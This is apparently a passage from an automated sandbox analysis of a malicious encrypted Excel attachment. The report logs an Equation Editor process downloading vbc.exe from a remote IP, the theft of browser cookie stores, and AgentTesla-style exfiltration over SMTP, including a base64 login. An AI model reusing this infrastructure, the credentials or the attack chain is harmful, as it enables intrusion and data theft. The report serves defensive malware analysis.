                                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49FD4D5E.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):79394
                                                                    Entropy (8bit):7.864111100215953
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AC0AF44.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7608
                                                                    Entropy (8bit):5.0883971365678695
                                                                    Encrypted:false
                                                                    SSDEEP:96:+Scw4zLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5cw44+sW31RGtdVDYM3VfmkpH
                                                                    MD5:1DCD2699428439328B8F8158BDDD95AF
                                                                    SHA1:128D12CBA01BA939CBF5749D59DAF73F457896BA
                                                                    SHA-256:3DC3543E4169A1A2A04DECB711F746F548A55ACF29CC5E94C5561C580835C104
                                                                    SHA-512:943D4AFDA65D1BEAF9D1645C2B2C5E1A9F5297658D364BC076ED26569B78F476A577FA20DB562F39DDF7A23DE83A83E9453350F83753C4A1A2CE1B978DCFEA71
                                                                    Malicious:false
                                                                    Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....W.d...................$.S...S.'.q....\...$.S.....$.S...S.W.q....$.S..6Ov_.q......q....Dy.w......{.....H.S....w....$.......d.........S.J^.q.... ^.q`.........i...{.-...t.S..<.w................<..v.Zfv....X.1n..............................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E93766D.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):84203
                                                                    Entropy (8bit):7.979766688932294
                                                                    Encrypted:false
                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96B46D4B.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):84203
                                                                    Entropy (8bit):7.979766688932294
                                                                    Encrypted:false
                                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9725E68F.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7608
                                                                    Entropy (8bit):5.091127811854214
                                                                    Encrypted:false
                                                                    SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                    MD5:EB06F07412A815AED391F20298C1087B
                                                                    SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                    SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                    SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF41FE75.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7592
                                                                    Entropy (8bit):5.454640002047622
                                                                    Encrypted:false
                                                                    SSDEEP:96:zncw4zcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bcw4oSTxK/LA/FVoL3QtKhn+e3+wi
                                                                    MD5:0B7AB720BBD945ABEA038779107CB7C5
                                                                    SHA1:977FC667A0F3E46FA669F6D984819192656A3F54
                                                                    SHA-256:D89A16975BF224EA0B0431ABF2FCECAA5B8992AF2C79FFBCD80EF0D7F651A63F
                                                                    SHA-512:C49269DD89B12236E2992DDDBE4E56E6F2FD6EA9E3D6DE7D12EB32C0D68F56E946399A0BE0A5BD3CF7F0DF68E51152A1EDFE22AAA2DD33DB7AF2925F1AAE6ADA
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2989F2.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):49744
                                                                    Entropy (8bit):7.99056926749243
                                                                    Encrypted:true
                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emf
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):648132
                                                                    Entropy (8bit):2.8124530118203914
                                                                    Encrypted:false
                                                                    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                    SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                                                    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9E48091.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):8815
                                                                    Entropy (8bit):7.944898651451431
                                                                    Encrypted:false
                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\mb0hhwca.zd2\Chrome\Default\Cookies
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):28672
                                                                    Entropy (8bit):0.9650411582864293
                                                                    Encrypted:false
                                                                    SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                    MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                    SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                    SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                    SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\mb0hhwca.zd2\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                    Category:dropped
                                                                    Size (bytes):524288
                                                                    Entropy (8bit):0.08107860342777487
                                                                    Encrypted:false
                                                                    SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                    MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                    SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                    SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                    SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Process:C:\Users\Public\vbc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true
                                                                    C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):330
                                                                    Entropy (8bit):1.4377382811115937
                                                                    Encrypted:false
                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                    Malicious:true
                                                                    C:\Users\Public\vbc.exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true

                                                                    Static File Info

                                                                    General

                                                                    File type:CDFV2 Encrypted
                                                                    Entropy (8bit):7.9956775745766056
                                                                    TrID:
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                    File name:AGG POWER RFQ.xlsx
                                                                    File size:1376256
                                                                    MD5:b6d32254c5e3faa7fb26cccabddad2f4
                                                                    SHA1:abf474e378247ebeb3300de929a50d0996286c01
                                                                    SHA256:fca7f5cda93c9f473a6c3e9c3857d19d69c25835fd71b21d8b1354f78b102397
                                                                    SHA512:33705d7290a7745c0e9dbd3619af16d50a98fa45819df54be4c640638f41a9cbc2400b54a19f0ed7b99b973f03cba6f5b7a19ea582a58b438196e98cb5dea53b
                                                                    SSDEEP:24576:Iw3AyaaFIkkLcYNbKkk7Sao4tdu4KeoSds+bpU988T6CB6u7Vz7Fnsdl:/z8lADdu4gas+bpi8y6A9VvFS

                                                                    File Icon

                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "AGG POWER RFQ.xlsx"

                                                                    Indicators

                                                                    Has Summary Info:False
                                                                    Application Name:unknown
                                                                    Encrypted Document:True
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:False

                                                                    Streams

                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                    General
                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                    File Type:data
                                                                    Stream Size:64
                                                                    Entropy:2.73637206947
                                                                    Base64 Encoded:False
                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                    General
                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                    File Type:data
                                                                    Stream Size:112
                                                                    Entropy:2.7597816111
                                                                    Base64 Encoded:False
                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                    General
                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                    File Type:data
                                                                    Stream Size:200
                                                                    Entropy:3.13335930328
                                                                    Base64 Encoded:False
                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                    General
                                                                    Stream Path:\x6DataSpaces/Version
                                                                    File Type:data
                                                                    Stream Size:76
                                                                    Entropy:2.79079600998
                                                                    Base64 Encoded:False
                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1360984
                                                                    General
                                                                    Stream Path:EncryptedPackage
                                                                    File Type:data
                                                                    Stream Size:1360984
                                                                    Entropy:7.99985102724
                                                                    Base64 Encoded:True
                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                    General
                                                                    Stream Path:EncryptionInfo
                                                                    File Type:data
                                                                    Stream Size:224
                                                                    Entropy:4.48853893529
                                                                    Base64 Encoded:False

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp                 Protocol  SID      Message                              Source Port  Dest Port  Source IP     Dest IP
                                                                    06/16/21-12:22:28.742921  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49166        587        192.168.2.22  148.66.138.106
                                                                    06/16/21-12:22:32.112719  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49167        587        192.168.2.22  148.66.138.106

                                                                    Network Port Distribution

                                                                    TCP Packets


                                                                    UDP Packets


                                                                    DNS Queries

                                                                    Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
                                                                    Jun 16, 2021 12:22:25.770656109 CEST  192.168.2.22  8.8.8.8  0x208a    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:25.840090036 CEST  192.168.2.22  8.8.8.8  0x208a    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.022252083 CEST  192.168.2.22  8.8.8.8  0x208a    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.344799042 CEST  192.168.2.22  8.8.8.8  0xc590    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.409868002 CEST  192.168.2.22  8.8.8.8  0xc590    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.469491005 CEST  192.168.2.22  8.8.8.8  0xc590    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.531307936 CEST  192.168.2.22  8.8.8.8  0xc590    Standard query (0)  mail.alkhaleejautoparts.com  A (IP address)  IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                         CName  Address         Type            Class
                                                                    Jun 16, 2021 12:22:25.839512110 CEST  8.8.8.8    192.168.2.22  0x208a    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.021575928 CEST  8.8.8.8    192.168.2.22  0x208a    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:26.083831072 CEST  8.8.8.8    192.168.2.22  0x208a    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.409277916 CEST  8.8.8.8    192.168.2.22  0xc590    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.468858004 CEST  8.8.8.8    192.168.2.22  0xc590    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.530682087 CEST  8.8.8.8    192.168.2.22  0xc590    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)
                                                                    Jun 16, 2021 12:22:29.592813015 CEST  8.8.8.8    192.168.2.22  0xc590    No error (0)  mail.alkhaleejautoparts.com         148.66.138.106  A (IP address)  IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • 192.3.141.146

                                                                    HTTP Packets

                                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                                    0           192.168.2.22  49165        192.3.141.146   80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Timestamp                             kBytes transferred  Direction  Data
                                                                    Jun 16, 2021 12:20:52.563646078 CEST  0                   OUT        GET /win/vbc.exe HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 192.3.141.146
                                                                    Connection: Keep-Alive
                                                                    Jun 16, 2021 12:20:52.705996990 CEST | 1 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 16 Jun 2021 10:20:52 GMT
                                                                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                    Last-Modified: Wed, 16 Jun 2021 05:38:46 GMT
                                                                    ETag: "111a00-5c4db81175295"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1120768
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdownload


                                                                    SMTP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                    Jun 16, 2021 12:22:26.973731041 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 220-sg3plcpnl0096.prod.sin3.secureserver.net ESMTP Exim 4.93 #2 Wed, 16 Jun 2021 03:22:26 -0700
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Jun 16, 2021 12:22:26.974232912 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | EHLO 783875
                                                                    Jun 16, 2021 12:22:27.268367052 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 250-sg3plcpnl0096.prod.sin3.secureserver.net Hello 783875 [84.17.52.18]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-CHUNKING
                                                                    250-STARTTLS
                                                                    250-SMTPUTF8
                                                                    250 HELP
                                                                    Jun 16, 2021 12:22:27.270143986 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | AUTH login c2FsZXM1QGFsa2hhbGVlamF1dG9wYXJ0cy5jb20=
                                                                    Jun 16, 2021 12:22:27.562062025 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 334 UGFzc3dvcmQ6
                                                                    Jun 16, 2021 12:22:27.858735085 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 235 Authentication succeeded
                                                                    Jun 16, 2021 12:22:27.859620094 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | MAIL FROM:<sales5@alkhaleejautoparts.com>
                                                                    Jun 16, 2021 12:22:28.152915001 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 250 OK
                                                                    Jun 16, 2021 12:22:28.153232098 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | RCPT TO:<lisafury29@safina.cc>
                                                                    Jun 16, 2021 12:22:28.445422888 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 250 Accepted
                                                                    Jun 16, 2021 12:22:28.445713997 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | DATA
                                                                    Jun 16, 2021 12:22:28.737297058 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 354 Enter message, ending with "." on a line by itself
                                                                    Jun 16, 2021 12:22:28.743681908 CEST | 49166 | 587 | 192.168.2.22 | 148.66.138.106 | .
                                                                    Jun 16, 2021 12:22:29.046072960 CEST | 587 | 49166 | 148.66.138.106 | 192.168.2.22 | 250 OK id=1ltSgm-00FDWs-Ht
                                                                    Jun 16, 2021 12:22:30.428925037 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 220-sg3plcpnl0096.prod.sin3.secureserver.net ESMTP Exim 4.93 #2 Wed, 16 Jun 2021 03:22:30 -0700
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Jun 16, 2021 12:22:30.429297924 CEST | 49167 | 587 | 192.168.2.22 | 148.66.138.106 | EHLO 783875
                                                                    Jun 16, 2021 12:22:30.707295895 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 250-sg3plcpnl0096.prod.sin3.secureserver.net Hello 783875 [84.17.52.18]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-CHUNKING
                                                                    250-STARTTLS
                                                                    250-SMTPUTF8
                                                                    250 HELP
                                                                    Jun 16, 2021 12:22:30.707587004 CEST | 49167 | 587 | 192.168.2.22 | 148.66.138.106 | AUTH login c2FsZXM1QGFsa2hhbGVlamF1dG9wYXJ0cy5jb20=
                                                                    Jun 16, 2021 12:22:30.985790014 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 334 UGFzc3dvcmQ6
                                                                    Jun 16, 2021 12:22:31.270421982 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 235 Authentication succeeded
                                                                    Jun 16, 2021 12:22:31.270809889 CEST | 49167 | 587 | 192.168.2.22 | 148.66.138.106 | MAIL FROM:<sales5@alkhaleejautoparts.com>
                                                                    Jun 16, 2021 12:22:31.550159931 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 250 OK
                                                                    Jun 16, 2021 12:22:31.550559044 CEST | 49167 | 587 | 192.168.2.22 | 148.66.138.106 | RCPT TO:<lisafury29@safina.cc>
                                                                    Jun 16, 2021 12:22:31.831468105 CEST | 587 | 49167 | 148.66.138.106 | 192.168.2.22 | 250 Accepted
                                                                    Jun 16, 2021 12:22:31.831796885 CEST | 49167 | 587 | 192.168.2.22 | 148.66.138.106 | DATA
